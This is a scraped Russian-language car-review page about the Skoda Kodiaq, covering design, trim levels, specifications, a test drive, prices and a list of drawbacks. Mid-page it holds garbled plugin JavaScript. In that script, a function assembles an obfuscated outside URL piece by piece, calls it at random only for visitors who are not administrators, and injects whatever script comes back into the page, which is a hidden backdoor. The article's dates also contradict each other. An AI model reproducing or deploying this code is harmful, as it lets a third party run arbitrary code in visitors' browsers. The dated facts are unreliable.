«Шкода Кодиак» 2017 года: фото, комплектация, характеристики, цена, отзывы

Что представляет собой «шкода кодиак» 2021

Новый джип, 2021 года Skoda Kodiaq создан на платформе паркетника Volkswagen Tiguan (MQB), но при этом он имеет большие размеры в длину и ширину. Хотя рассчитан автомобиль на 5 посадочных мест, имеются его модификации на 7 кресел.

Skoda Kodiaq относится к универсальным внедорожникам, предназначенным для эксплуатации в условиях городского движения и для загородных поездок по пересеченной местности или бездорожью.

Этот семиместный внедорожник скорее для тех, кто предпочитает не платить большие деньги за вещи, которым есть более дешевая альтернатива
Если вы привыкли к дорогому костюму от Brioni и элитным швейцарским часам, то новый Skoda Kodiaq точно не для вас

В экстерьере автомобиля выделяются строгие, чёткие линии элементов кузова в сочетании с минималистским дизайном, которые намеренно подчёркивают крупные размеры машины.

Особенностями внешнего вида кузова «Шкоды Кодиак» являются:

  • широкая решётка радиатора с хромированным ободком по периметру;
  • узкие головные фары с ходовыми огнями на светодиодах;
  • оригинальной формы передний бампер, оснащённый массивным воздухозаборником, что придаёт кроссоверу спортивный и одновременно агрессивный внешний вид;
  • пластиковая защита нижней части кузова по контуру всего автомобиля;
  • выдвигающаяся при открывании дверей защитная пластиковая полоса на их торце, предохраняющая от повреждений при неаккуратном открытии в условиях плотной парковки;
  • строгие линии зада с острыми стрелами задних фонарей, аналогичных модели Super B, этой же торговой марки;
  • наличие панорамной крыши с люком даже в базовой комплектации автомобиля.

Интерьер «Шкоды Кодиак» отличается лаконичностью дизайна, но это не лишает салон комфортности и технологичности. Следует особенно отметить его просторность, как в ширину, так и в длину.

Полноприводный «дизелек» предложит на выбор 6-ступенчатую механическую трансмиссию или 7-ступенчатый «автомат»
Новый кроссовер оснащается 2-литровым дизельным мотором мощностью 150 или 190 лошадиный сил

Важно! В кроссовере Skoda Kodiaq имеется возможность перемещать второй ряд сидений к багажнику, увеличивая тем самым пространство для ног пассажиров, либо сдвигать их вперёд для установки 2 дополнительных кресел в третьем ряду.

Из особенностей внутреннего оформления салона можно отметить:

  • высокое качество отделочных материалов;
  • эргономичную профилированную форму кресел, имеющих боковую поддержку и электропривод для их регулировки;
  • наличие широкого дисплея с сенсорным управлением, оснащённым множеством полезных функций;
  • установленную мультимедийную систему с десятью динамиками и возможностью управления через Android Auto или CarPlay;
  • кожаный многофункциональный руль с обогревом;
  • двух- и трехзонную систему климат-контроля;
  • самое объёмное для автомобилей класса внедорожника багажное отделение ёмкостью 720 литров.

Кроссовер «Шкода Кодиак» оснащен самой современной многофункциональной электроникой, что облегчает процесс управление автомобилем, и делает его более безопасным. Последние новости об этом внедорожнике наверняка порадуют российских покупателей. В начале июня «Кодиак» был официально презентован на рынке России и теперь уже продаётся во всех автосалонах Skoda. Пока для отечественного потребителя поступают авто чешского производства. Их модельный ряд представлен пяти- и семиместными джипами с 6 вариантами комплектации.

Раньше, чтобы получить столько свободного места, вы должны были ездить в фургоне
Багажное пространство имеет 720 литров. А если вы сложите задние сидения, то увеличите этот объем до 2 065 литров

«шкода кодиак» 2021, комплектация

На российский рынок новый внедорожник Skoda Kodiaq будет поступать в следующих модификациях:

  • Ambition Plus TSI (150hp) – базовой комплектации с 1,4-литровым бензиновым двигателем и роботизированной 6-ступенчатой КПП;
  • комплектации Ambition Plus TDI (150hp), отличающейся от базовой оснащённости лишь наличием другого типа мотора, а именно – турбодизелем, с рабочим объёмом 2,0 литра, той же мощностью – 150 «лошадей» и семиступенчатой роботизированной КПП;
Причем, благодаря продольной регулировке кресел второго ряда, на галерке смогут разместиться не только дети, но и взрослые
Для чешского кроссовера, впервые в данном классе, предусмотрен третий ряд сидений, что особо подчеркивает простор в интерьер кроссовера
  • Ambition Plus TSI (180hp) – в данную комплектацию входит бензиновый мотор с объёмом цилиндров 2,0 литра и роботизированная КПП на 7 ступеней;
  • Style Plus TSI (150hp), в которой использован двигатель базовой модели и 6-ступенчатая КПП;
  • Style Plus TDI (150hp) с дизельным мотором, объёмом 2,0 литра и 7-ступчатой КПП-робот;
  • Style Plus TSI (180hp) с четырёхцилиндровым двухлитровым бензиновым турбомотором.

Конфигуратор первых трёх начальных комплектаций предусматривает наличие следующей опциональной оснащённости и оборудования салона автомобиля:

  • противотуманных фар;
  • автоматического стояночного тормоза;
  • антиблокировочной системы тормозов;
  • автоматической системы торможения авто перед преградами;
  • климат-контроля, адаптированного на две зоны;
  • дефлекторов воздуховодов для второго ряда сидений;
  • 6 подушек безопасности;
  • кондиционера;
  • легкосплавных колёсных дисков диаметром 17 дюймов;
  • систем подогрева руля, сидений, а также обогревания зеркал;
  • регулировки рулевой колонки и сиденья водителя;
  • системы помощи старта авто на подъёме;
  • системы динамической стабилизации автомобиля;
К опциям, подчеркивающим комфорт и статус модели, относятся: кожаный салон с вентиляцией сидений, передние кресла с электроприводом и памятью настроек, аудиосистема премиум-класса, электропривод двери багажника
Несмотря на устрашающий вид, кроссовер не смотрится неуклюжим
  • электропривода регулировки зеркал;
  • штатного парковочного радара (парктроника);
  • аудиосистемы с CD и МР3 плейером;
  • электроподъёмников передних и задних стёкол;
  • многофункциональной электроники.

Три топовые комплектации авто «Шкода Кодиак» дополнительно предусматривают установку:

  • камер кругового обзора;
  • отделки интерьера салона кожей Алькантара;
  • трёхзонного климат-контроля;
  • аудиосистемы Canton;
  • ещё трёх подушек безопасности;
  • колёсных дисков на 18 дюймов;
  • электропривода задней двери багажника;
  • электрического привода регулировки сиденья водителя с памятью на три позиции.

В дополнительном пакете опций для авто «Кодиак» любой модификации можно приобрести и установить:

  • предпусковой подогреватель;
  • датчики дождя и света;
  • навигационную систему.
Здесь есть крепления для детских сидений Isofix, спинки сидений можно наклонить для более комфортной езды
Салон автомобиля с тщательно проработанной приборной панелью с множеством сенсорных удобств – это, пожалуй, козырь «Кодиака»

Внимание! Российский покупатель сможет уже сегодня выбирать, на сколько мест ему приобрести кроссовер Skoda Kodiaq – на 5 или 7 мест.

10 недостатков skoda kodiaq (шкода кадьяк) — skoda kodiaq

17.01.2021

Автор статьи: shkoda-avto.ru

Skoda Kodiaq российской сборки стала доступнее благодаря переднему приводу, а не производству на российских предприятиях, как думает большинство автолюбителей. Но есть и недостатки Шкода Кадьяк

Тест драйв Skoda Kodiaq в условиях сурового российского климата помог выявить целый ряд недостатков нового кроссовера. Они в странах с мягким климатом и качественными дорогами не всплывали. Данная информация безусловно окажется ценной для поклонников данного бренда, готовых стать счастливыми владельцами чешского красавца Шкода Кадьяк.

Ране заслужено были сказаны лестные слова о Skoda Kodiaq, пришло время рассмотреть и минусы нового кроссовера. Критичными имеющиеся недостатки трудно назвать, но ознакомится с правдивой информацией перед приобретением далеко не дешевого автомобиля будет бесспорно полезно.

Для тест драйва использовалась топовая версия Skoda Kodiaq в подкапотном пространстве которой прописан бензиновый турбированный движок объёмом 2.0 литра и мощностью 180 лошадок. Рассмотрим 10 главных минусов Skoda Kodiaq, выявленных в ходе проведенного тест драйва.

  1. Первый недостаток кроссовера – его огромные габариты, однако для многих владельцев большие размеры являются плюсом. Шкода Кадьяк помимо впечатляющих размеров кузова может похвастаться и вместительностью салона. Салон Шкода Кодиак просторен и способен принять 5 взрослых людей. Большие габариты в городе превращаются в существенный недостаток из-за проблем с парковкой.
  2. Ко второму минусу относятся неэффективные ассистенты, главная задача которых помочь водителю совершить парковку в тесных условиях. Наружные зеркала не способны охватить всю картину происходящего.
  3. Для Шкода Кодьяк характерно запотевание оптики. Проблема в плохой герметизации оптики. Возможно в скором будущем чешская компания начнет отзывать автомобили для ликвидации данного недочета. Правда в развитие такого сценария вериться с трудом.
  4. Топовые версии Skoda Kodiaq имеют хромирование боковых окон. Хромированные элементы начинают «цвести» после незначительной эксплуатации кроссовера,что негативно сказывается на экстерьере всего кузова. Данный недостаток по мнению диллеров возникает из-за использования агрессивных шампуней на автомойках.
  5. Топовый мультимедийный комплекс в Skoda Kodiaq стоимостью 1000 долларов США бесспорно крут. Стоит отметить отличную навигацию,качественные динамики и сабвуфер. А вот синхронизация со смартфоном выявила проблемы. Оптимальным вариантом станет выбор в пользу более скромного мультимедийного комплекса.
  6. В багажном отсеке Шкода Кадьяк имеются три сетки для фиксации багажа. Одна из крепежных сеток является бесполезным аксессуаром, поскольку ее не реально прикрепить. У самой крупной крепежной сетки также выявлены недостатки, с ее помощью крепяться исключительно крупные предметы.
  7. Отзывы Шкода Кодиак показывают, что крупноразмерный салон в зимнее время после нахождения на улице долго прогревается. В прочем данный недостаток характерен для любого габаритного автомобиля. Правда в Skoda Kodiaq данный минус успешно нивелируется благодаря наличию трехступенчатой системы подогрева кресел и рулевого колеса.
  8. К недостатку Skoda Kodiaq относиться и принцип работы электрического ручника. В иных моделях он не отключается пока водитель не наденет ремень безопасности. Владелец Шкоды беспрепятственно начинает движение даже если не пристегнул ремень безопасности.
  9. В независимости от комплектации Шкода Кодиак может похвастаться добротным круиз-контролем,который даже в условиях плотного движения неплохо справляется со своей задачей. Если автомобиль остановился из-за впереди стоящей машины, то продолжить движение можно лишь нажатием акселератора. Данная проблема затрагивает многие современные автомобили, однако новый кодиак более заботливая, умная и продуманная в отличие от многих конкурентов.
  10. К последнему минусу, который имеется у абсолютно всех автомобилей относится завышенный расход топлива по сравнению с заявленным производителем. Как правило данная погрешность составляет от 10 до 20%. В условиях городской эксплуатации Шкода Кодьяк потребляет до 15 литров топлива на 100 км вместо заявленных 9.

Подводя итоги можно отметить, что Skoda Kodiaq тест прошла достойно, а имеющиеся минусы не являются критичными и сполна компенсируются многочисленными плюсами. Технические характеристики Шкода Кодиак, качество сборки и используемые отделочные материалы заслуживают высокой оценки. Прогресс наблюдается во всех аспектах однозначно.

Skoda Kodiaq не относиться к автомобилям премиум класса, но и бюджетником однозначно не является. Чешским конструкторам и дизайнерам удалось создать современный конкурентно способный автомобиль с эффектным внешним видом и инновационным оснащением. Компания возлагает огромные надежды на Skoda Kodiaq, которые кроссоверу под силу оправдать.

Дзен Автомобильный Гуру

«:’

‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ c «

«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count «

«:’

‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ c «

«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(«flat_r_mb»,»zen.yandex»),flat_userVars.referer=»zen.yandex»);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,»<$1>») r[2],l=r[0];l—;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «n» «g» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(«.flat__4_video»);-1!==l.indexOf(«go» «oglesyndication»)?t.append(l):flatPM_setHTML(t[0],l),e.find(«.flat__4_video_flex»).one(«click»,function(){n(this).addClass(«show»)})}),n(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=n(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),r=parseInt(o),l=setInterval(function(){a.text(—r),r<=0&&(clearInterval(l),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){n(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&n(«.flat__4_video_flex»).remove()})}

Skoda kodiaq 2021, технические характеристики

Новый чешский внедорожник «Шкода Кодиак» собран с поперечным расположением силового агрегата. На этом автомобиле в различных модификациях будут устанавливаться следующие виды моторов:

  • предназначенный только для переднего привода, четырёхцилиндровый бензиновый двигатель TSI на 1,4 литра, с турбонаддувом, мощностью 125 лошадиных сил, с максимальной скоростью до 190 километров в час (разгон до 100 километров за 10,7–10,9 секунды);
  • 1,4-литровый двигатель TSI мощностью 150 л. с., для полноприводных автомобилей, способный разгонять их до 100 километров за 9,8–9,9 секунды и достигать скорости 197 километров в час;
  • двигатель TSI 2,0 литра мощностью 180 «лошадей», способный ускоряться до ста километров за 9,4 секунды, с расходом бензина 6,1 литра при движении в городском режиме;
  • дизель TDI 2,0 литра, мощностью 110 кВт (150 л. с.) – на внедорожник «Шкода Кодиак» может устанавливаться две разновидности таких моторов – для переднего привода и полноприводных машин;
  • двигатель на дизельном топливе TDI 2,0 литра на 190 лошадиных сил, предназначенный только для полноприводных моделей.

Все кроссоверы «Шкода» комплектуются механической либо роботизированной КПП на 6 и 7 ступеней. Основные их технические характеристики следующие:

  • тип кузова универсал 5-дверный;
  • габариты 4697х1882х1676;
Рабочий объем бензиновых и дизельных агрегатов варьируется от 1,4 до 2,0 литров, мощность в диапазоне 125-180 сил
Шкоды Кодиак предусматривают применение исключительно 4-цилиндровых моторов с турбонаддувом
  • размер колёсной базы 2791 мм;
  • снаряжённый вес, в зависимости от комплектации, 1550–1677 килограмм;
  • клиренс 194 мм;
  • объём багажного отделения 720 литров, может быть увеличен за счёт складывания сидений второго ряда до 2065 литров;
  • расход топлива на 100 километров пробега для бензиновых двигателей от 6 до 7,3 литра, а для турбодизельных моторов 5–5,7 литра;
  • максимальная скорость от 194 до 206 километров в час.

Безопасность

Как уже отмечалось раньше, новинка получила 6 подушек безопасности. Помимо этого в систему безопасности входит также большое количество датчиков движения и помощи при управлении. Как отмечают эксперты, Шкода Кадьяк станет одним из самых безопасных кроссоверов в своём классе.

Внешний вид

Экстерьер нового кроссовера Шкода Кадьяк 2021 действительно впечатляет. Если сравнивать внедорожник с другими, более «старыми» модельными рядами Шкода, то он выделяется среди них своим спортивным и динамичным обликом.

Спереди стоит сразу отметить невероятно мощный бампер, который уместил на себе большой продолговатый воздухозаборник. Уровнем выше, разработчики установили радиаторную решётку, которая с обеих сторон плавно переходит в светодиодные фары головной оптики. Под фарами спрятались небольшие, но технологичные противотуманки. Капот нельзя назвать гладким, так как в глаза сразу бросаются крупные выштамповки и воздухотоки.
Шкода Кадьяк 2021
Боковая часть автомобиля также получилась шикарной. Внедорожник действительно напоминает большого бурого медведя, которые несмотря на свои габариты, в любой момент может устремиться вперед. Огромные колёсные арки и боковые двери визуально еще более увеличивают автомобиль. Оптимальный уровень наклона лобового стекла, вместе с низпадающей обтекаемой крышей, создают фантастические аэродинамические условия.

Задняя часть не стала исключением в плане успешных инженерных решений. Уже с бокового ракурса стало понятно, что кроссовер обладает очень вместительным багажным отсеком, а большая задняя дверца только это подтвердила.

Комплектации

Уже известно, что в начальную комплектацию войдут следующие возможности:— кондиционер;— климат контроль;— аудиосистема;— 6 подушек безопасности;— автоматический ручной тормоз;— системы безопасности и помощи при вождении.

Тест драйв «шкоды кодиак 2021»

Первое, что ощущает водитель в салоне нового внедорожника Skoda Kodiaq – комфорт и простор большого пространства, а также удобное сиденье и руль. Основные выводы по вождению авто можно сделать следующие:

  • управление облегчает хороший обзор как естественный, обеспечиваемый удачно расположенными стойками кузова и его стеклами, так и камерами панорамного вида;
  • электроусилитель руля обеспечивает лёгкость вождения в поворотах такой довольно крупной машиной;
  • у автомобиля хорошая динамика и тормоза, она идеально подходит для городского движения по дорогам с твёрдым покрытием, на бездорожье подвеска «Кодиака» слишком чувствительно реагирует на всякую мелочевку под колёсами, но хорошо отражает удар на крупных ухабах и ямах;
  • наличие автоматической парковочной системы позволяет чётко припарковать довольно габаритный джип, требуя от водителя лишь нажатия на педали;
  • хорошая, честная шумоизоляция, машина плавно трогается с места, а при движении на любой скорости, внутри не ощущается ни вибраций, ни лишнего шума, лишь отдалённо еле слышится подвывание турбины.
Приобрести данную модель можно будет в начале 2021 года в Европе, продажи в РФ планируются лишь на июнь
Skoda Kodiaq – это рациональный выбор для людей, которые больше всего любят делать разумные вещи

Новый кроссовер, несмотря на свои размеры, довольно лёгок и послушен в управлении, без задержек реагирует на нажатие педали газа и имеет хорошо сбалансированное шасси.

Технические характеристики

Приятным сюрпризом для автолюбителей стало то, что разработчики сделали доступными целых 5 силовых агрегатов – три бензиновых и два дизельных. Стоит отметить, что все они будут четырёхцилиндровыми. Теперь поговорим подробнее о каждом из них:

  1. Бензиновый мотор, с объёмом 1,4 л, способен продуцировать 125 лошадиных сил.
  2. Бензиновый 1,4-литровый мотор, который выдаёт 150 лошадиных сил.
  3. Старший бензиновый двигатель – объём 2 л, мощность – 180 «лошадок».
  4. Младший дизельный двигатель, с объёмом 2 л, способен продуцировать 150 лошадиных сил.
  5. Старший дизельный мотор – двухлитровый двигатель, мощностью 190 лошадиных сил.

Стоит отметить, что будут доступными как переднеприводная, так и полноприводная версии.В качестве подвески используется адаптивная DCC, в которой доступны нормальный и спортивный режимы работы.

Цена на «шкоду кодиак 2021»

Продажи нового джипа Skoda Kodiaq, наконец, стартовали и в России. Пока на отечественном рынке будет продаваться только продукция чешского производства, начало сборки таких авто в России планируется лишь на середину 2021 года.

Как и для всех автомобилей, вопрос, сколько стоит та или иная модель, неразрывно связан с её комплектацией. По самой низкой стоимости продаются лишь авто с базовой оснащённостью. Сегодня на российском рынке можно купить «Кодиак» по таким ценам:

  • базовая модификация Ambition Plus с бензиновым двигателем 1,4 литра обойдется в 1999000 рублей;
  • аналогичная комплектация с 7-ступенчатой коробкой и дизелем стоит 2309000 рублей;
  • Ambition Plus с двухлитровым мотором имеет стоимость 2349000 рублей;
  • Skoda Kodiaq в комплектации Style Plus со 150-сильным бензиновым мотором можно купить за 2,315 млн рублей;
  • за турбодизельный вариант кроссовера в комплектации Style Plus придётся выложить 2,575 миллиона рублей;
  • цена топовой комплектации Style Plus TSI (180hp) составляет 2615000 рублей.

Какой будет стоимость «Кодиака» российской сборки, пока не сможет сказать никто, но она будет определённо ниже сегодняшней цены этого авто, завозимого из Чехии.

Отзывы о «шкоде кодиак» 2021

России новая Skoda Kodiaq продаётся ещё только месяц, а потому недостаточно опробована широким кругом пользователей. Но и те отзывы первых счастливых владельцев этого мощного чешского кроссовера, которые стали появляться в интернете, единодушно отмечают такие качества машины, как:

  • стильный и солидный экстерьер машины;
  • комфортность и простор салона;
  • хорошие ходовые качества и управляемость;
  • наличие многих нужных и интересных наворотов и аксессуаров.

И даже то, что уже стали проявляться некоторые недостатки этого авто, как, например, чрезмерная трансляция подвеской мелких неровностей, или не слишком заметная оцифровка на сером фоне спидометра и тахометра, ничуть не умаляет главных достоинств первого чешского джипа.

[democracy id=»4″]

[democracy id=»9″]

Вывод

Новый кроссовер Шкода Кадьяк 2021 можно смело назвать большим прорывом в автомобильной индустрии. Несмотря на большие габариты, новинка обладает фантастическими динамическими качествами. Также порадовал большой ассортимент силовых агрегатов, что позволит каждому автолюбителю подобрать себе наиболее оптимальный вариант.

Старт продаж в России запланирован на лето 2021 года. Хотя продажи на европейском рынке начались еще в октябре 2021 года, никто пока не рискует предположить, какую ценовую политику предложит чешская компания для отечественного рынка. Стоит также отметить, что в будущем автомобиль может выпускаться на заводе в Нижнем Новгороде, но случится это не ранее осени-зимы 2021 года.

Оставьте комментарий

Войти